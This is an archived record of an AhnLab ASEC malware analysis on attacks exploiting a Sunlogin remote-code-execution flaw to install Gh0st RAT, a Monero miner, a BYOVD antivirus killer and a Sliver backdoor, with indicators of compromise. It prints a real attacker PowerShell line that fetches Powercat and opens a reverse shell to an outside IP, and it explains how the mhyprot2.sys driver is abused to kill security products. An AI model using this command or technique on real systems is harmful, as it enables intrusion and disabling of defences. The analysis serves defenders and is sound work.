{
	"id": "ef3a9259-24b9-488c-a401-af4d92658b1b",
	"created_at": "2026-04-06T00:12:03.788251Z",
	"updated_at": "2026-04-10T03:24:24.676468Z",
	"deleted_at": null,
	"sha1_hash": "1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e",
	"title": "Sliver Malware With BYOVD Distributed Through Sunlogin Vulnerability Exploitations - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3751240,
	"plain_text": "Sliver Malware With BYOVD Distributed Through Sunlogin\r\nVulnerability Exploitations - ASEC\r\nBy ATCP\r\nPublished: 2023-02-06 · Archived: 2026-04-05 15:34:10 UTC\r\nSliver is an open-source penetration testing tool developed in the Go programming language. Cobalt Strike and\r\nMetasploit are major examples of penetration testing tools used by many threat actors, and various attack cases\r\ninvolving these tools have been covered here on the ASEC blog. Recently, there have been cases of threat actors\r\nusing Sliver in addition to Cobalt Strike and Metasploit.\r\nThe ASEC (AhnLab Security Emergency response Center) analysis team is monitoring attacks against systems\r\nwith either unpatched vulnerabilities or misconfigured settings. During this process, we have recently discovered a\r\nSliver backdoor being installed through what is presumed to be vulnerability exploitation on certain software. Not\r\nonly did threat actors use the Sliver backdoor, but they also used the BYOVD (Bring Your Own Vulnerable\r\nDriver) malware to incapacitate security products and install reverse shells.\r\nThe software that was targeted by this vulnerability exploitation was Sunlogin, a remote-control program\r\ndeveloped in China. Sunlogin, which had its remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) and the code that exploited said vulnerability made publicly available last year, is still being targeted\r\nby vulnerability attacks.\r\nFirst, a brief summary of the Sliver penetration testing tool will be given. Afterward, cases involving the\r\ncontinuous Sunlogin attacks will be covered through our ASD (AhnLab Smart Defense) logs. Finally, we will\r\nbreak down the recently confirmed attack cases where Sliver and BYOVD were ultimately installed.\r\n1. Sliver\r\nPenetration testing tools are used for the purpose of checking the security vulnerabilities within the network and\r\nsystems of companies and institutes. They can potentially be used for malicious purposes if placed in the hands of\r\nthreat actors as they generally provide various features for each penetration testing stage.\r\nThe most well-known commercial penetration testing tool would most likely be Cobalt Strike. Following the\r\nrelease of its cracked version, it is still being used by various threat actors to this very day. There is also the tool\r\ndeveloped in open-source, Metasploit, which is similarly easy to obtain and thus often used in attacks. There are\r\nmany other penetration testing tools aside from Cobalt Strike and Metasploit, but a majority of recent cases were\r\nfound to be using the open-source penetration testing tool, Sliver. [1]\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 1 of 12\n\nFigure 1. Sliver description\r\nAmong the characteristics of Sliver, the fact that it was developed using Go, a cross platform-supporting language,\r\nallows it to support Windows, Linux, and macOS. Its comparatively recent development could also be considered\r\na defining characteristic, but this is because the tools that have been consistently used by threat actors since the\r\npast, like Cobalt Strike and Metasploit, are more prone to being detected by security products compared to Sliver.\r\nTherefore, Sliver is being used by various threat actors in place of existing tools like Cobalt Strike. [2] [3] [4]\r\nCommands can be sent by the threat actor through the backdoor created by Sliver to perform a variety of\r\nmalicious behaviors. Its features include most of the features supported by typical backdoors and RAT malware,\r\nsuch as process and file handling, command execution, uploading/downloading files, and screenshot capturing. It\r\nalso provides other features necessary for overtaking internal networks, such as privilege escalation, process\r\nmemory dumping, and lateral movement.\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 2 of 12\n\nFigure 2. Command transmission process to the installed Sliver backdoor\r\nFigure 3. A portion of the commands supported by Sliver\r\nIn addition to file, behavior, and memory detection, anti-malware security products are also capable of detecting\r\nnetwork behaviors like when a malware strain tries to communicate with C\u0026C servers. Therefore, various\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 3 of 12\n\npenetration testing tools, including Cobalt Strike, provide multiple ways to bypass communicating with the C\u0026C\r\nserver in order to evade network detection. Sliver also supports methods that use mTLS, WireGuard, HTTP(S),\r\nand DNS to communicate with the C\u0026C server, which allows it to evade the network detection of security\r\nproducts through the encryption of network communication.\r\nSession Mode and Beacon Mode are the two modes also supported by the Sliver backdoor. Sliver that has been\r\nbuilt in Session Mode communicates with the C\u0026C server in real-time while the Sliver built in Beacon Mode\r\ncommunicates with the C\u0026C server asynchronously. The latter obtains commands or task lists from the C\u0026C\r\nserver and sends the results after executing them.\r\n2. Vulnerability Exploitations and Attacks Targeting Sunlogin\r\nSunlogin is a remote-control utility developed by the Chinese tech company, Oray. In 2022, the remote code\r\nexecution vulnerability, CNVD-2022-10270 / CNVD-2022-03672, was made publicly available along with the\r\ncode that exploited it, [5] after which attacks that abused these were found. We assume that “SunloginCLient.exe”\r\nis the vulnerable process that is being targeted by attacks, [6] and multiple attacks have been confirmed since early\r\n2022 according to our ASD logs.\r\n2.1. Gh0st RAT\r\nAlthough the packet used in the attack has not been found, it is assumed that the malware are installed through the\r\nSunlogin RCE vulnerability exploitation following the PowerShell command ran on the “SunloginCLient.exe”\r\nprocess. The “SunloginCLient.exe” process used in the actual attacks is an earlier version than v11.0.0.33, which\r\nis known to have been patched. The following is the process tree of the PowerShell command that downloads and\r\ninstalls Gh0st RAT. It is through this that we can confirm that the PowerShell command was run by the\r\n“SunloginCLient.exe” process.\r\nFigure 4. Gh0st RAT installation process tree\r\nAside from this, an assumption can also be inferred by examining the command used in the attacks. PoC, which\r\nwas revealed first, uses the following command when exploiting vulnerabilities. [7]\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 4 of 12\n\nFigure 5. PoC’s vulnerability exploitation routine\r\nThe command used in the aforementioned Gh0st RAT attack is as follows and is similar to the command used in\r\nthe PoC above.\r\nFigure 6. PowerShell command used in attacks\r\n2.2. XMRig CoinMiner\r\nThreat actors occasionally install XMRig CoinMiner instead of Gh0stRAT. According to our ASD log, the\r\nfollowing command is executed via the “SunloginCLient.exe” process which downloads and runs “syse.bat”, the\r\nbatch malware.\r\nFigure 7. Vulnerability exploitation command that installs XMRig CoinMiner\r\n“syse.bat” downloads either the “t.zip” or “t_64.zip” compressed file alongside 7z according to the hardware\r\nenvironment. The files are then unzipped in either the “C:\\windows\\WinSysMaintenance\\.arc ” or\r\n“C:\\WinSysMaintenance\\.arc ” directories depending on the privilege.\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 5 of 12\n\nFigure 8. Download routine for the compressed file containing malware\r\nInstead of XMRig CoinMiner being contained as-is within the compressed file, it is executed through the launcher\r\nand loader malware. “watch.exe” is the launcher and “splwow32.exe” is the loader malware that loads and\r\ndecodes the encoded XMRig, “WINSysCoreR.bin”, before executing it in the memory.\r\nFigure 9. Compressed file containing malware\r\nAfterward, “syse.bat” changes the XMRig wallet address and transfers “WINSysCoreR.bin” as an argument of\r\n“splwow32.exe” before executing it. This starts the Monero coin mining process in the infected system.\r\nFigure 10. XMRig execution routine\r\n3. Cases of Recent Attacks\r\nThere have been a steady number of attacks targeting the Sunlogin RCE vulnerability. Most of these cases\r\ninvolved the installation of Gh0st RAT and XMRig CoinMiner. In this blog post, we will be covering the recently\r\nconfirmed attacks where a Sliver backdoor and Powercat reverse shell were installed.\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 6 of 12\n\nThe threat actor first installed a PowerShell script using the Sunlogin RCE vulnerability. This PowerShell script\r\nfunctioned by using the BYOVD technique to incapacitate security products installed in the system before\r\ninstalling a reverse shell using Powercat. It is unconfirmed whether it was done by the same threat actor, but after\r\na few hours, a log shows that a Sliver backdoor was installed on the same system through a Sunlogin RCE\r\nvulnerability exploitation.\r\n3.1. BYOVD \u0026 Powercat\r\nThe first command executed on the target system is a command that downloads and executes the following\r\n“2.ps1” PowerShell script.\r\nFigure 11. PowerShell command that installs the loader malware\r\nThe PowerShell script is obfuscated, but upon closer examination, we can see that it has a simple structure with\r\nthe following two major features. The first feature decodes the compressed .NET PE before loading and executing\r\nit in the memory. The encoded PE is developed in .NET, and the function\r\nkdjvasbulidcfaeusyefoaexwyroaw7fyoaeufhodusicvfy8cye() is executed through a PowerShell command.\r\nFigure 12. Decoded PowerShell command – Modified\r\n“ujacldfajlvjfaslflcevdfuaelfiua.exe” is assumed to be the open-source tool Mhyprot2DrvControl that was\r\npersonally modified by the threat actor to forcefully terminate security products. [8] Unlike the open-source tool,\r\nthe malware has the following AvList which contains the process names of anti-malware products to be forcefully\r\nterminated.\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 7 of 12\n\nFigure 13. List of anti-malware products to be force terminated\r\nMhyprot2DrvControl uses the BYOVD (Bring Your Own Vulnerable Driver) technique, which abuses vulnerable\r\nWindows driver files and uses the escalated privilege to perform arbitrary behaviors. Recently, many threat actors\r\nhave been using this technique to escalate their privileges and forcefully terminate security products to evade\r\ndetection. [9]\r\nMhyprot2DrvControl specifically abuses the mhyprot2.sys file. This file is an anti-cheat driver developed by the\r\nChinese game company miHoYo, the creators of Genshin Impact. mhyprot2.sys is a normal, authenticated driver\r\nfile with a valid signature, but the process that calls this file has vulnerable verification conditions. Through a\r\nsimple bypassing process, the malware can access the kernel area through mhyprot2.sys. The developer of\r\nMhyprot2DrvControl provided multiple features that can be utilized with the privileges escalated through\r\nmhyprot2.sys. Among these, the threat actor used the feature which allows the force termination of processes to\r\ndevelop a malware that shuts down multiple anti-malware products.\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 8 of 12\n\nFigure 14. Routine for checking the process list to terminate AV products\r\nThe second feature of the PowerShell script is downloading Powercat from an external source and using it to run\r\nthe reverse shell in the infected system. When executed, the reverse shell connects to the C\u0026C server and provides\r\nthe threat actor control over the infected system by providing the cmd.exe, in other words, the shell.\r\nIEX (New-Object Net.Webclient).DownloadString(“hxxp://45.144.3[.)216/powercat.ps1”);\r\npowercat -c 45.144.3.216 -p 14356 -e cmd\r\n3.2. Sliver Backdoor Attack\r\nBeside the PowerShell script above, the threat actor used the vulnerability to execute a PowerShell command that\r\ninstalled the “acl.exe” malware. The following is our ASD log of the PowerShell command executed through the\r\nSunlogin RCE vulnerability.\r\nFigure 15. Sliver backdoor installed through the Sunlogin vulnerability\r\nFigure 16. PowerShell command that installs the Sliver backdoor\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 9 of 12\n\nThe downloaded “acl.exe” is the Sliver backdoor. Sliver is normally obfuscated when the backdoor is built. Thus,\r\nonly the obfuscated Go functions can be seen even after decompiling. This means that the threat actor used the\r\nbinaries generated by the Sliver framework in the attacks as-is without additional packing processes.\r\nFigure 17. Obfuscated Sliver backdoor\r\nSince the function name is obfuscated but the practical routine remains the same, static analysis shows that Sliver\r\nutilized in the attack was built in Session Mode and used the mTLS protocol for communication with the C\u0026C\r\nserver. Additionally, the team found the configuration data that was decoded together with the Sliver backdoor’s\r\nname and C\u0026C server address through the debugging process as shown in Figure 18.\r\nFigure 18. Decoded configuration data\r\nSliver backdoor name: LITERARY_WHOLE\r\nC\u0026C server address: mtls://43.128.62[.]42:8888\r\n4. Conclusion\r\nRecently, the team has confirmed cases of attack where various strains of malware, including the Sliver backdoor,\r\nwere installed on vulnerable and unpatched software. Sliver is being used in various forms of attack by recent\r\nattack groups that steal information from company systems and install ransomware on them. This is because, as a\r\npenetration testing tool, Sliver offers the required step-by-step features like account information theft, internal\r\nnetwork movement, and overtaking the internal network of companies, just like Cobalt Strike.\r\nUsers should apply the latest patch to their installed software to prevent vulnerability exploitations in advance.\r\nAlso, V3 should be updated to the latest version so that malware infection can be prevented.\r\nFile Detection\r\n– CoinMiner/BAT.Generic.SC185824 (2023.01.24.03)\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 10 of 12\n\n– Trojan/Win.Launcher.C5364876 (2023.01.24.00)\r\n– Trojan/Win.Loader.C5364877 (2023.01.24.00)\r\n– CoinMiner/BIN.Encoded (2023.01.24.03)\r\n– CoinMiner/Text.Config (2023.01.24.03)\r\n– Trojan/Win32.RL_Agent.R362708 (2021.01.12.05)\r\n– Trojan/PowerShell.Obfuscated (2023.01.24.03)\r\n– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)\r\n– Trojan/PowerShell.Powercat.S1567 (2021.07.07.02)\r\n– Trojan/Win.Sliver.C5363965 (2023.01.22.02)\r\nBehavior Detection\r\n– Execution/MDP.Powershell.M2514\r\n– Malware/MDP.DriveByDownload.M1659\r\nAMSI Detection\r\n– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)\r\n– Trojan/PowerShell.Powercat.SA1567 (2021.07.07.02)\r\nIOC\r\nMD5\r\n– 836810671d8e1645b7dd35b567d75f27 : XMRig Downloader Batch (syse.bat)\r\n– 29d04d986a31fbeab39c6b7eab5f5550 : Launcher (watch.exe)\r\n– 17a84000567055be92bda8659de5184d : Loader (splwow32.exe)\r\n– 57b21f6b5d50e4ec525bee77bc724a4d : Encoded XMRig (WINSysCoreR.bin)\r\n– 7eaa2e3d9c8b7aa6ecdd8dad0d1ba673 : config.json\r\n– 1c5e484da6e6e1c2246f6d65f23bb49b : config.json\r\n– 8c10401a59029599bed435575914b30d : Gh0stRAT\r\n– 2434d32b1bebf22ac7ab461a44cf1624 : Powershell Script (2.ps1)\r\n– f71b0c2f7cd766d9bdc1ef35c5ec1743 : AV Killer – BYOVD (ujacldfajlvjfaslflcevdfuaelfiua.exe)\r\n– 8a319fa42e7c7432318f28a990f15696 : Powercat (powercat.ps1)\r\n– 6f0c0faada107310bddc59f113ae9013 : Sliver Backdoor (acl2.exe)\r\nDownload\r\n– hxxp://5.199.173[.]103/syse.bat : XMRig Downloader Batch\r\n– hxxp://5.199.173[.]103/t.zip : XMRig zip\r\n– hxxp://5.199.173[.]103/t_64.zip : XMRig zip\r\n– hxxp://5.199.173[.]103/7za.exe : 7z\r\n– hxxp://61.155.8[.]2:81/c6/include/images/help23.sct : Gh0st RAT\r\n– hxxp://45.144.3[.]216/2.ps1 : PowerShell Malware\r\n– hxxp://45.144.3[.]216/powercat.ps1 : Powercat\r\n– hxxp://43.128.62[.]42/acl.exe : Sliver Backdoor\r\nC\u0026C\r\n– idc6.yjzj[.]org:56573 : Gh0st RAT\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 11 of 12\n\n– 45.144.3[.]216:14356 : Powercat Reverse Shell\r\n– 43.128.62[.]42:8888 : Sliver Backdoor\r\nSubscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC\r\nand detailed analysis information.\r\nSource: https://asec.ahnlab.com/en/47088/\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47088/"
	],
	"report_names": [
		"47088"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434323,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.pdf",
		"text": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.txt",
		"img": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.jpg"
	}
}